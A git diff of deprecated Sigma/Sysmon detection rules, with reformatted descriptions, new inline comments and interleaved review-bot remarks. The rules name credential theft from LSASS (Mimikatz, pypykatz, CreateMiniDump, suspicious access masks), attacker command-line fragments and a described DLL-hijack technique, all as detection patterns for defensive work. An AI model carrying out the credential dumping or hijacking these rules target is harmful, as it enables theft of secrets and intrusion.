 id: db2110f3-479d-42a6-94fb-d35bc1e46492
 status: deprecated
 related:
- - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d
- type: derived
-description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process
- memory for credential extraction on the attacker's machine
+ - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d
+ type: derived
+description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
 author: Florian Roth (Nextron Systems)
 references:
 - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
diff --git a/sigma/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml b/sigma/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml
index c7070ed5b..c8d836fca 100644
--- a/sigma/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml
+++ b/sigma/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml
@@ -1,8 +1,7 @@
 title: LSASS Memory Dump File Creation
 id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a
 status: deprecated
-description: LSASS memory dump creation using operating systems utilities. Procdump
- will use process name in output file if no name is specified
+description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified
 references:
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
 author: Teymur Kheirkhabarov, oscd.community
@@ -27,8 +26,7 @@ fields:
 - ComputerName
 - TargetFilename
 falsepositives:
- - Dumping lsass memory for forensic investigation purposes by legitimate incident
- responder or forensic invetigator
+ - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator
 - Dumps of another process that contains lsass in its process name (substring)
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml b/sigma/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml
index b8056302d..f9f591ab0 100644
--- a/sigma/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml
+++ b/sigma/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml
@@ -1,8 +1,8 @@
 title: Mimikatz MemSSP Default Log File Creation
 id: 034affe8-6170-11ec-844f-0f78aa0c4d66
 related:
- - id: 9e099d99-44c2-42b6-a6d8-54c3545cab29
- type: similar
+ - id: 9e099d99-44c2-42b6-a6d8-54c3545cab29 # Replacement for this rule
+ type: similar
 status: deprecated
 description: Detects Mimikatz MemSSP default log file creation
 references:
diff --git a/sigma/sysmon/deprecated/file_event_win_susp_clr_logs.yml b/sigma/sysmon/deprecated/file_event_win_susp_clr_logs.yml
index b084b4742..4aa0cbd24 100644
--- a/sigma/sysmon/deprecated/file_event_win_susp_clr_logs.yml
+++ b/sigma/sysmon/deprecated/file_event_win_susp_clr_logs.yml
@@ -1,8 +1,7 @@
 title: Suspicious CLR Logs Creation
 id: e4b63079-6198-405c-abd7-3fe8b0ce3263
 status: deprecated
-description: Detects suspicious .NET assembly executions. Could detect using Cobalt
- Strike's command execute-assembly.
+description: Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.
 references:
 - https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html
 - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/
@@ -19,8 +18,7 @@ tags:
 logsource:
 category: file_event
 product: windows
- definition: Check your sysmon configuration for monitoring UsageLogs folder. In
- SwiftOnSecurity configuration we have that thanks @SBousseaden
+ definition: Check your sysmon configuration for monitoring UsageLogs folder. In SwiftOnSecurity configuration we have that thanks @SBousseaden
 detection:
 file_event:
 EventID: 11
@@ -39,7 +37,6 @@ detection:
 - svchost
 condition: file_event and selection
 falsepositives:
- - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and
- msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675
+ - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml b/sigma/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml
index 7104564e5..101cb9eed 100644
--- a/sigma/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml
+++ b/sigma/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml
@@ -1,8 +1,7 @@
 title: Alternate PowerShell Hosts - Image
 id: fe6e002f-f244-4278-9263-20e4b593827f
 status: deprecated
-description: Detects alternate PowerShell hosts potentially bypassing detections looking
- for powershell.exe
+description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
 references:
 - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html
 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
@@ -23,17 +22,18 @@ detection:
 Description: System.Management.Automation
 ImageLoaded|contains: System.Management.Automation
 filter_generic:
- - Image|endswith:
- - \powershell.exe
- - \mscorsvw.exe
- - Image|startswith:
- - C:\Program Files (x86)\Microsoft Visual Studio\
- - C:\Program Files\Microsoft Visual Studio\
- - C:\Windows\System32\
- - C:\Program Files\Citrix\ConfigSync\
- - Image: C:\Program Files\PowerShell\7\pwsh.exe
+ - Image|endswith:
+ - \powershell.exe
+ - \mscorsvw.exe
+ - Image|startswith:
+ - C:\Program Files (x86)\Microsoft Visual Studio\
+ - C:\Program Files\Microsoft Visual Studio\
+ - C:\Windows\System32\
+ - C:\Program Files\Citrix\ConfigSync\
+ - Image: C:\Program Files\PowerShell\7\pwsh.exe
 filter_aurora:
- Image: null
+ # This filter is to avoid a race condition FP with this specific ETW provider in aurora
+ Image:
 condition: image_load and (selection and not 1 of filter_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/deprecated/image_load_side_load_advapi32.yml b/sigma/sysmon/deprecated/image_load_side_load_advapi32.yml
index 46c07b07a..2d8f0537f 100644
--- a/sigma/sysmon/deprecated/image_load_side_load_advapi32.yml
+++ b/sigma/sysmon/deprecated/image_load_side_load_advapi32.yml
@@ -1,8 +1,7 @@
 title: Suspicious Load of Advapi31.dll
 id: d813d662-785b-42ca-8b4a-f7457d78d5a9
 status: deprecated
-description: Detects the load of advapi31.dll by a process running in an uncommon
- folder
+description: Detects the load of advapi31.dll by a process running in an uncommon folder
 references:
 - https://github.com/hlldz/Phant0m
 author: frack113
diff --git a/sigma/sysmon/deprecated/image_load_side_load_scm.yml b/sigma/sysmon/deprecated/image_load_side_load_scm.yml
index 238433ebd..b18723eab 100644
--- a/sigma/sysmon/deprecated/image_load_side_load_scm.yml
+++ b/sigma/sysmon/deprecated/image_load_side_load_scm.yml
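Review bot: In `filter_aurora`, the new `Image:` with no value relies on YAML's implicit null and reads like an unfinished entry, whereas the explicit `Image: null` it replaces states the "field is absent" intent directly. Suggest keeping the new explanatory comment and writing the key as `Image: null`. Both forms should parse to the same null value, so the filter's behaviour is presumably unchanged either way; worth confirming with the converter in use.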
@@ -1,11 +1,10 @@
 title: SCM DLL Sideload
 id: bc3cc333-48b9-467a-9d1f-d44ee594ef48
 related:
- - id: 602a1f13-c640-4d73-b053-be9a2fa58b77
- type: similar
+ - id: 602a1f13-c640-4d73-b053-be9a2fa58b77
+ type: similar
 status: deprecated
-description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services
- (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
+description: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
 references:
 - https://decoded.avast.io/martinchlumecky/png-steganography/
 - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
diff --git a/sigma/sysmon/deprecated/image_load_side_load_svchost_dlls.yml b/sigma/sysmon/deprecated/image_load_side_load_svchost_dlls.yml
index 3a98876d1..56bf5b51f 100644
--- a/sigma/sysmon/deprecated/image_load_side_load_svchost_dlls.yml
+++ b/sigma/sysmon/deprecated/image_load_side_load_svchost_dlls.yml
@@ -1,17 +1,10 @@
 title: Svchost DLL Search Order Hijack
 id: 602a1f13-c640-4d73-b053-be9a2fa58b77
 status: deprecated
-description: 'Detects DLL sideloading of DLLs that are loaded by the SCM for some
- services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
-
- IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist
- within C:\Windows\System32\ by default.
-
- An attacker can place their malicious logic within the PROCESS_ATTACH block of
- their library and restart the aforementioned services "svchost.exe -k netsvcs"
- to gain code execution on a remote machine.
-
- '
+description: |
+ Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
+ IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default.
+ An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine.
 references:
 - https://decoded.avast.io/martinchlumecky/png-steganography/
 - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
diff --git a/sigma/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml b/sigma/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml
index 48c3c48b0..57e57b607 100644
--- a/sigma/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml
+++ b/sigma/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml
@@ -31,6 +31,7 @@ detection:
 - \wbemcomn.dll
 - \wbemprox.dll
 - \wbemdisp.dll
+ # - '\wbemsvc.dll' # too many FPs, tested with Win11 and O365
 condition: image_load and selection
 falsepositives:
 - Possible. Requires further testing.
diff --git a/sigma/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml b/sigma/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml
index 395657c03..63c123bb2 100644
--- a/sigma/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml
+++ b/sigma/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml
@@ -16,12 +16,7 @@ tags:
 logsource:
 product: windows
 category: pipe_created
- definition: Note that you have to configure logging for Named Pipe Events in Sysmon
- config (Event ID 17 and Event ID 18). The basic configuration is in popular
- sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but
- it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config,
- https://github.com/olafhartong/sysmon-modular. How to test detection? You
- can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
+ definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
 detection:
 pipe_created:
 EventID:
diff --git a/sigma/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml b/sigma/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml
index 36a9f5932..6ed97138c 100644
--- a/sigma/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml
+++ b/sigma/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml
@@ -1,24 +1,13 @@
 title: Suspicious In-Memory Module Execution
 id: 5f113a8f-8b61-41ca-b90f-d374fa7e4a39
 status: deprecated
-description: 'Detects the access to processes by other suspicious processes which
- have reflectively loaded libraries in their memory space.
-
- An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID
- 10 cannot reference a stack call to a dll loaded from disk (the standard way),
-
- it will display "UNKNOWN" as the module name. Usually this means the stack call
- points to a module that was reflectively loaded in memory.
-
- Adding to this, it is not common to see such few calls in the stack (ntdll.dll
- --> kernelbase.dll --> unknown) which essentially means that
-
- most of the functions required by the process to execute certain routines are
- already present in memory, not requiring any calls to external libraries.
-
+description: |
+ Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space.
+ An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way),
+ it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory.
+ Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that
+ most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries.
 The latter should also be considered suspicious.
-
- '
 references:
 - https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/
 author: Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro
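Review bot: The unchanged context line `The latter should also be considered suspicious.` now ends up inside the new `description: |` literal block, but it was a continuation line of the old single-quoted scalar and is not re-indented by this hunk. A literal block takes its indentation from its first content line, so if this line is indented less than the added `Detects the access to processes …` line the block terminates early and the rest of the file will not parse as intended; whitespace is not visible in this rendering, so this is worth confirming. If the indentation differs, the fix is to re-indent that one line to match the added lines above it.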
@@ -60,37 +49,37 @@ detection: - '0x1F3FFF' - '0x1FFFFF' filter: - - SourceImage|endswith: - - \Windows\System32\sdiagnhost.exe - - \procexp64.exe - - \procexp.exe - - \Microsoft VS Code\Code.exe - - \aurora-agent-64.exe - - \aurora-agent.exe - - \git\usr\bin\sh.exe - - \IDE\devenv.exe - - \GitHubDesktop\Update.exe - - \RuntimeBroker.exe - - \backgroundTaskHost.exe - - \GitHubDesktop.exe - - SourceImage|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ - - C:\Windows\Microsoft.NET\Framework\\*\NGenTask.exe - - C:\Program Files (x86)\Microsoft Visual Studio\ - - C:\Program Files\Microsoft Visual Studio\ - - C:\Windows\Microsoft.NET\Framework - - C:\WINDOWS\System32\DriverStore\ - - C:\Windows\System32\WindowsPowerShell\ - - SourceImage: - - C:\WINDOWS\system32\taskhostw.exe - - C:\WINDOWS\system32\ctfmon.exe - - C:\WINDOWS\system32\NhNotifSys.exe - - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - C:\Windows\explorer.exe - - TargetImage: C:\Windows\System32\RuntimeBroker.exe - - TargetImage|endswith: \Microsoft VS Code\Code.exe - - CallTrace|contains: '|C:\WINDOWS\System32\RPCRT4.dll+' + - SourceImage|endswith: + - \Windows\System32\sdiagnhost.exe + - \procexp64.exe + - \procexp.exe + - \Microsoft VS Code\Code.exe + - \aurora-agent-64.exe + - \aurora-agent.exe + - \git\usr\bin\sh.exe + - \IDE\devenv.exe + - \GitHubDesktop\Update.exe + - \RuntimeBroker.exe + - \backgroundTaskHost.exe + - \GitHubDesktop.exe + - SourceImage|startswith: + - C:\Program Files (x86)\ + - C:\Program Files\ + - C:\Windows\Microsoft.NET\Framework\\*\NGenTask.exe + - C:\Program Files (x86)\Microsoft Visual Studio\ + - C:\Program Files\Microsoft Visual Studio\ + - C:\Windows\Microsoft.NET\Framework + - C:\WINDOWS\System32\DriverStore\ + - C:\Windows\System32\WindowsPowerShell\ + - SourceImage: + - C:\WINDOWS\system32\taskhostw.exe + - C:\WINDOWS\system32\ctfmon.exe + - C:\WINDOWS\system32\NhNotifSys.exe + - C:\Windows\ImmersiveControlPanel\SystemSettings.exe + - 
C:\Windows\explorer.exe + - TargetImage: C:\Windows\System32\RuntimeBroker.exe + - TargetImage|endswith: \Microsoft VS Code\Code.exe + - CallTrace|contains: '|C:\WINDOWS\System32\RPCRT4.dll+' # attempt to save the rule with a broader filter filter_set_1: SourceImage: C:\WINDOWS\Explorer.EXE TargetImage: diff --git a/sigma/sysmon/deprecated/proc_access_win_lsass_susp_access.yml b/sigma/sysmon/deprecated/proc_access_win_lsass_susp_access.yml index ecb5a9220..6b7ca44d4 100644 --- a/sigma/sysmon/deprecated/proc_access_win_lsass_susp_access.yml +++ b/sigma/sysmon/deprecated/proc_access_win_lsass_susp_access.yml @@ -1,16 +1,13 @@ title: Credential Dumping Tools Accessing LSASS Memory id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d status: deprecated -description: Detects processes requesting access to LSASS memory via suspicious access - masks. This is typical for credentials dumping tools +description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf -author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas - Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, - oscd.community +author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community date: 2017/02/16 modified: 2023/11/30 tags: 
@@ -30,11 +27,14 @@ detection: TargetImage|endswith: \lsass.exe GrantedAccess|startswith: - '0x40' + # - '0x1000' # minimum access requirements to query basic info from service + # - '0x1400' - '0x100000' - - '0x1410' - - '0x1438' - - '0x143a' - - '0x1418' + - '0x1410' # car.2019-04-004 + # - '0x1010' # car.2019-04-004 + - '0x1438' # car.2019-04-004 + - '0x143a' # car.2019-04-004 + - '0x1418' # car.2019-04-004 - '0x1f0fff' - '0x1f1fff' - '0x1f2fff' @@ -54,7 +54,7 @@ detection: SourceImage|startswith: - C:\ProgramData\Microsoft\Windows Defender\ - C:\Program Files\Windows Defender\ - - C:\Program Files\Microsoft Security Client\MsMpEng.exe + - C:\Program Files\Microsoft Security Client\MsMpEng.exe # Windows7 SourceImage|endswith: \MsMpEng.exe filter_defender_updates: SourceImage: C:\Windows\System32\svchost.exe @@ -118,7 +118,7 @@ detection: SourceImage|endswith: \explorer.exe GrantedAccess: '0x401' filter_mrt: - SourceImage: C:\Windows\system32\MRT.exe + SourceImage: C:\Windows\system32\MRT.exe # Windows Malicious Software Removal Tool GrantedAccess: - '0x1410' - '0x1418' @@ -127,7 +127,7 @@ detection: SourceImage|endswith: - \handle.exe - \handle64.exe - filter_edge: + filter_edge: # version in path 96.0.1054.43 SourceImage|startswith: C:\Program Files (x86)\Microsoft\Edge\Application\ SourceImage|endswith: \Installer\setup.exe filter_webex: 
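Review bot: The five `# car.2019-04-004` annotations on the GrantedAccess values are a bare identifier with no indication of what it refers to; if it is the MITRE CAR analytic, one `references:` entry for CAR-2019-04-004 would record the provenance where Sigma tooling and readers expect it, and the per-value comments could shrink to `# see references: CAR-2019-04-004`. The commented-out `0x1400` and `0x1010` masks, unlike `0x1000`, carry no reason for their exclusion, so a maintainer cannot tell whether they were dropped for false positives or were never tested; a short note in the form `# - '0x1400' # excluded: <reason>` would close that gap. The enclosing `selection` block begins above the hunk.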
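Review bot: The new comment `filter_edge: # version in path 96.0.1054.43` is misleading, because the filter below it pins no version: `SourceImage|startswith: C:\Program Files (x86)\Microsoft\Edge\Application\` together with `SourceImage|endswith: \Installer\setup.exe` matches the Edge installer under any version directory. Either say that the version is deliberately not matched, e.g. `# observed with 96.0.1054.43; version directory intentionally unpinned`, or drop the comment so it does not suggest a narrower exclusion than the filter actually applies.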
@@ -145,9 +145,22 @@ detection: - '0x410' - '0x1410' filter_msbuild: + # This FP was generated while building CPython from source and could be related to other similar examples. + # But if you don't do that kind of stuff consider removing it from the rule ;) SourceImage|startswith: C:\Program Files\Microsoft Visual Studio\ SourceImage|endswith: \MSBuild\Current\Bin\MSBuild.exe GrantedAccess: '0x1F3FFF' + # Old - too broad filter + # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts + # - '\wmiprvse.exe' + # - '\taskmgr.exe' + # - '\procexp64.exe' + # - '\procexp.exe' + # - '\lsm.exe' + # - '\MsMpEng.exe' + # - '\csrss.exe' + # - '\wininit.exe' + # - '\vmtoolsd.exe' filter_games: SourceImage|contains: \SteamLibrary\steamapps\ condition: process_access and (selection and not 1 of filter_*) diff --git a/sigma/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml b/sigma/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml index add16e199..0bb13ac3b 100644 --- a/sigma/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml +++ b/sigma/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml @@ -25,7 +25,7 @@ detection: - C:\Windows\System32\KERNELBASE.dll+ - libffi-7.dll - _ctypes.pyd+ - - python3*.dll+ + - python3*.dll+ # Pypy requires python>=3.6 GrantedAccess: '0x1FFFFF' condition: process_access and selection falsepositives: diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml index 9bb1350b2..3402d4f2a 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml 
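Review bot: The caveat in the newly added `# easy to bypass` remark on the commented-out image-name list applies just as much to the surviving `filter_games` entry `SourceImage|contains: \SteamLibrary\steamapps\`, which is a substring match anywhere in the path rather than a fixed install location, so the same note belongs on that filter. The `filter_msbuild` comment asking deployers to remove the filter if they do not build from source is useful operational guidance, but as an inline comment it is lost in any generated or converted copy of the rule; the `falsepositives:` list is the structured place for it. The `detection` block begins above the hunk.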
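Review bot: The new comment `# Pypy requires python>=3.6` names the wrong project: this rule is about pypykatz (see the file name), not PyPy, and the version remark does not explain the wildcard on the line it annotates. A comment tied to what the CallTrace entry actually matches, such as `# python3*.dll+ covers python3.dll and python3X.dll loaded by pypykatz`, would be more accurate. The enclosing `selection` block begins above the hunk.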
@@ -1,8 +1,7 @@ title: APT29 id: 033fe7d6-66d1-4240-ac6b-28908009c71f status: deprecated -description: This method detects a suspicious PowerShell command line combination - as used by APT29 in a campaign against U.S. think tanks. +description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. references: - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - -noni - -ep - bypass diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_gallium.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_gallium.yml index d6b4ee1bf..b1778d04c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_gallium.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_gallium.yml @@ -1,11 +1,10 @@ title: GALLIUM Artefacts id: 18739897-21b1-41da-8ee4-5b786915a676 related: - - id: 440a56bf-7873-4439-940a-1c8a671073c2 - type: derived + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived status: deprecated -description: Detects artefacts associated with activity group GALLIUM - Microsoft - Threat Intelligence Center indicators released in December 2019. +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) 
diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml index 588f0c705..547c64747 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml @@ -20,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains|all: - - localgroup - - admin - - /add - - CommandLine|contains: \Win64.exe + - CommandLine|contains|all: + - localgroup + - admin + - /add + - CommandLine|contains: \Win64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml index 25855dfa1..c98129c2d 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml @@ -1,8 +1,7 @@ title: Lazarus Activity Apr21 id: 4a12fa47-c735-4032-a214-6fab5b120670 status: deprecated -description: Detects different process creation events as described in Malwarebytes's - threat report on Lazarus group activity +description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity references: - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/ author: Bhabesh Raj 
@@ -21,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: - - mshta + CommandLine|contains|all: + - mshta # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3 - .zip selection_2: - ParentImage: C:\Windows\System32\wbem\wmiprvse.exe + ParentImage: C:\Windows\System32\wbem\wmiprvse.exe # Covered by 8a582fe2-0882-4b89-a82a-da6b2dc32937 Image: C:\Windows\System32\mshta.exe selection_3: ParentImage|contains: :\Users\Public\ diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml index 4063dea8f..fe9c11e3d 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml @@ -1,8 +1,7 @@ title: Lazarus Loaders id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e status: deprecated -description: Detects different loaders as described in various threat reports on Lazarus - group activity +description: Detects different loaders as described in various threat reports on Lazarus group activity references: - https://www.hvs-consulting.de/lazarus-report/ - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ 
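Review bot: The two `# Covered by <rule id>` comments record the relationship to other rules in free text only; Sigma's `related:` field, which this patch already uses elsewhere with `type: derived`, `similar` and `obsoletes`, is the machine-readable place for it, so `related:` entries for cc7abbd0-762b-41e3-8a26-57ad50d2eea3 and 8a582fe2-0882-4b89-a82a-da6b2dc32937 would let tooling surface the overlap when this deprecated rule is compared with its replacements. The first comment sits on `- mshta`, one of two required substrings in a `contains|all` list, so it reads as if only that substring is covered; moving it to the `selection_1:` line would make clear that the whole selection is what the other rule covers. The `detection` block begins above the hunk.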
@@ -22,27 +21,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd1: - CommandLine|contains|all: + CommandLine|contains|all: - 'cmd.exe /c ' - ' -p 0x' selection_cmd2: - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - C:\RECYCLER\ selection_rundll1: - CommandLine|contains|all: + CommandLine|contains|all: - 'rundll32.exe ' - C:\ProgramData\ selection_rundll2: - CommandLine|contains: + CommandLine|contains: - .bin, - .tmp, - .dat, - .io, - .ini, - .db, - condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 - and selection_rundll2 )) + condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )) falsepositives: - Unknown level: critical diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml index 7fa25ddd2..f0caf955c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml @@ -24,7 +24,7 @@ detection: - \powershell.exe - \pwsh.exe ParentImage|endswith: \excel.exe - CommandLine|contains: DataExchange.dll + CommandLine|contains: DataExchange.dll condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml index 39d3a4502..eda66fb7d 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml 
